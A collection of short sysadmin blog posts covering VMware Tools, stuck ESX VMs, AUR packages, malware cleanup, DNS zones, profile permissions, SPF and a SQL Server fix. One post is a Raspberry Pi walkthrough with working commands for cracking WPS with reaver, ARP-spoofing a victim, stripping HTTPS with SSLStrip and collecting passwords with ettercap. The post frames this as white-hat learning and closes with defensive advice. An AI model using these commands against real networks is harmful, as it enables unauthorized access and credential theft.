This is a HOWTO for installing VMware Tools on Centos 6.x.
Update your system so the kernel headers/devel will match your system:
Install the VMware tools prerequisites:
yum install make gcc kernel-devel kernel-headers glibc-headers perl
Reboot the server:
shutdown -r now
Mount the VMware Tools CD (after inserting it into the VM)
mount /dev/cdrom /media/cdrom
Copy the install bundle from the CD and extract it.
cp /mnt/cdrom/VMware-Tools*.tar.gz /root
tar xvfz VMwareTools*.tar.gz
Run the installer, default on all prompts works fine.
Reboot the server.
shutdown -r now
Sometimes when a LUN is full a VM cannot shutdown properly
- Make a SSH connection to the host where the VM running at
- Login as root
- list all running VM’s
# vmware-cmd -l
- Get the current state
# vmware-cmd /vmfs/volumes/<UUID>/<VMDIR>/<VMNAME>.vmx getstate
[root@esx ~]# vmware-cmd /vmfs/volumes/<UUID>/<VMDIR>/<VMNAME>.vmx getstate getstate() = stuck
- Now you know for sure the status is stuck you can kill the VM
ps auxwww |grep -i <VMNAME>.vmx</span>
root 3093 0.0 0.3 2016 860 ? S< Jul30 0:17 /usr/lib/vmware/bin/vmkload_app /usr/lib/vmware/bin/vmware-vmx -ssched.group=host/user -# name=VMware ESX Server;version=3.5.0;licensename=VMware ESX Server;licenseversion=2.0 build-158874; -@ pipe=/tmp/vmhsdaemon-0/vmx569228e44baf49d1; /vmfs/volumes/49392e30-162037d0-17c6-001f29e9abec/<VMDIR>/<VMNAME>.vmx
- The code right after root is the PID you must kill.
- First try only kill
- Wait 30 seconds and try a getstate again:
# vmware-cmd /vmfs/volumes/<UUID>/<VMDIR>/<VMNAME>.vmx getstate
- If the state is “off” your ready. If the state is still stuck try the following:
#kill -9 3093
- Wait 30 seconds and see the state is “off” now.
If the state is still “stuck” migrate all VM’s to another host en reboot the host.
When the VM is off by the kill command HA (High Availability) will power on the host automaticly. Now power down the server during the boot trough the VMWare GUI. If the VM is off try to remove snapshots, (re) move disks, or fix the thing who cause the crash.
Source: VMware KB 1004340
Finally I found a nice project for my Raspberry PI I’ll write down some notes in this post to make it easier to find back some linux commands. Please use this documentation only as a white hat hacker and for learning purposes only!!!!
- Have a compatible USB wireless dongle (list @ pwnpi.net )
- Download PwnPI @ pwnpi.net
- Download win32diskimager @ http://sourceforge.net/projects/win32diskimager/
- Write the image to a SD card
- Boot up your PI (with a network cable)
- Scan the network (I use netscan.exe)
- Connect with putty to your device
To break in a WPS compatible wireless access point:
- airmon-ng start wlan0
- reaver -i mon0 -b 64:27:37:50:02:77 -c 5 -vv
- After +/- 10 hours you have the PSK
Now configure the wireless with your credentials
- airmon-ng stop wlan0
- nano /etc/network/interfaces
- Original file:
auto lo iface lo inet loopback iface eth0 inet dhcp allow-hotplug wlan0 iface wlan0 inet manual wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp
- New file:
auto lo iface lo inet loopback iface eth0 inet dhcp iface wlan0 inet dhcp wpa-ssid "L0g0ff" wpa-psk "SomePassword" allow-hotplug wlan0 iface wlan0 inet dhcp #wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp
- Now bring up the wireless card: ifup wlan0
Now the wireless setup is done we make our PI an IP forwarding server. So that we can do man in the middle attacks.
- nano /proc/sys/net/ipv4/ip_forward change the 0 to 1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
(needed to forward all HTTP traffic to SSLStrip)
- sslstrip -l 666 (do not close this terminal)
Now the proxy is running we want to ARP spoof so that we can redirect all traffic to our PI
- arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1 (where 1.12 is our victim and 1.1 our gateway) (do not close ths terminal)
- You can also spoof the entire network with arpspoof -i wlan0 192.168.1.1, but if your PI cannot handle all traffic you will DoS your network.
And now all things are set the sniffing can begin
- ettercap -m ettercap.log -Tq -i wlan0 (don’t close the terminal)
The only thing left now is wait that the victim is going to log in a website and the username and password will write in to the ettercap.log file. With the command cat ettercap.log |grep USER you can see all the login credentials.
What do we learned?
- Never login to a website without https
- Never login to a website with https errors
- Always disable WPS on your router
- On company wireless sites always use a DMZ
Some packages are not in the default repositories you can install these on a alternative way.
First install the base development tools:
#pacman -S base-devel #pacman -S wget #pacman -S sudo
Go to https://aur.archlinux.org and find you package
Find the tarball, right click it and copy link location
Wget the package (example nemo-fm) and install the package
$cd ~ $wget https://aur.archlinux.org/packages/ne/nemo-fm/nemo-fm.tar.gz $tar xvzf nemo-fm.tar.gz $cd nemo-fm $makepkg -s $sudo pacman -U nemo-fm-1.0.2-1-i686.pkg.tar.xz
Best way to clean malware, rootkits, trojans and virusses (I call it malware from now on) is to backup your data, scan your data with another computer, remove your partition, reinstall Windows, install a virusscanner, update your Windows and put you data back. This is the safest method and I allways recommend this to people.
But if you don’t want to reinstall everything you can follow this steps to get a infected pc clean.
- Go to http://support.kaspersky.com/viruses/rescuedisk/main?qid=208286083 and download the USB util and the Kaspersky Rescue Disk 10 image
- Create a bootable USB disk with the USB util. You also can burn the ISO to a CD
- Boot from the USB/CD
- Make a network connection (I recommend using a network cable)
- Update the virus definitions
- Select all options and do a full system scan. This can take about 1,5 hour. Maybe longer if you use a slow disk/pc
- Clean all the malware
- Exit the rescue disk and boot windows
- Now download Kaspersky TDSSKiller @ http://support.kaspersky.com/faq/?qid=208283363
- Install the TDSSKiller software, scan the pc and remove the rootkits. It is almost impossible to clean a rootkit with a standard virusscanner. And because of some rootkits you can’t install drivers so you can’t load an antivirus real time protection.
- Now install a virusscanner. I recommend MS Security Essentials. This is a free antivirus software.
- Update the antivirus (this can take 45 min the first time so please be patient) software and do a full scan.
- Now download and install Malwarebytes Anti-Malware and do a full system scan.
- Update your Windows true windows update (and turn automatic updates ON!), update your browser, update Java and Flash or remove it.
Now your pc is clean of almost any type of malware and ready to protect it for new malware. All steps together takes almost 6 hours of scanning. So maybe reinstall your operating system is always the best option
This steps helped me to clean a very bad infected laptop that had not any antivirus realtime protection installed. If this steps also helps you to fix a infected pc please leave a comment below or buy me a beer (see widget on the right).
The difference between stub zone and secondary DNS zones… It all relates to replication, efficiency and availability.
Think of it like this:
There are two cities, London and Manchester.
London has 100 people, each with a book full of information (so 100 books in total).
You are in Manchester and you want to be able to have access to the information in these “books”.
There are two ways to do this as follows:
a) Another 100 people appear in London, they each make a copy of a book, and they each take their own car in order to drive to Manchester to meet you and give you the books. This causes a traffic jam due to the high number of people driving on the highway.
The above is secondary zone replication.
b) Instead of the above, you received the address of the 100 people in London. You need information in one of the books. You decide to take your car, and you drive to the address. You found the information you need, and you drive back to Manchester.
This example is a stub zone.
So think about it for a second.
In example A, the information is stored twice, both in London and Manchester, but the information requires a big highway to transport those 100 people, each in their individual cars, to your office in Manchester. Do you have a big enough highway to support this many people?
In example B, you don’t need such a big highway because a massive number of people are not clogging the highway, each trying to bring a book to you, but instead you decide to go back to London to find the book you need.
So what do we gather from this?
In example A, you need a large highway (lots of bandwidth) to get the books from London to Manchester. But once the information is in Manchester, you can very quickly find the book you need.
In example B, you don’t need a large highway to find the book in London, but you do need a RELIABLE highway. If this highway is closed, how do you get the book? And remember, since the books are not in Manchester, it will take longer for you to get the book (since you need to drive back and forth for it).
Hope this helps, first thing that came to my mind.
Thanks to Shinigami
By default the Roaming profile is only accessible for the owner (end-user) and the system account. I found a post on the internet with a workaround to access the profile without problems to the end user.
Using two tools, the first is SubInAcl.exe available from Microsoft (download), and the second is cacls.exe which you should already have by default in Windows.
These first two commands will give the local administrators group ownership of the user’s folder and everything underneath. NOTE: This will not change any existing permissions.
SubInAcl /subdirectories D:\Profile\User.Name /setowner=Administrators SubInAcl /subdirectories D:\Profile\User.Name\*.* /setowner=Administrators
This second command will give the local administrators group full access to the user’s foldercacls
D:\Profile\User.Name /T /E /C /G Administrators:F
Maybe it’s a illusion but if every one use a mail SPF DNS record and everyone will bounce or filter domains without a SPF the internet is spam free
Microsoft has a nice wizard to create a SPF for your own domain: http://www.microsoft.com/mscorp/safety/content/technologies/senderid/wizard/
Today I had this problem for the second time. Last time it cost me 3 hours to find the solution. Now I find your article and I fixed it in 30 minutes
My Exact error was (summary.txt):
MSP Error: 29528 The setup has encountered an unexpected error while Setting Internal Properties. The error is: Fatal error during installation.
The workaround resolution involves the following steps:
For a stand-alone installation of SQL Server 2005
Remove the following registry subkeys that store SID settings:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL.X\Setup\SQLGroup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL.X\Setup\AGTGroup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL.X\Setup\FTSGroup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL.X\Setup\ASGroup
Note In these registry subkeys, MSSQL.X is a placeholder for the corresponding value on a specific system. You can determine MSSQL.X on a specific system by examining the value of the MSSQLSERVER registry entry under the following registry subkey:
Reinstall the SQL Server 2005 service pack or the SQL Server 2005 hotfix package.
For some reason, the local SIDs had been changed or removed or something and SQL just needed to figure out what was going on.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\SQL\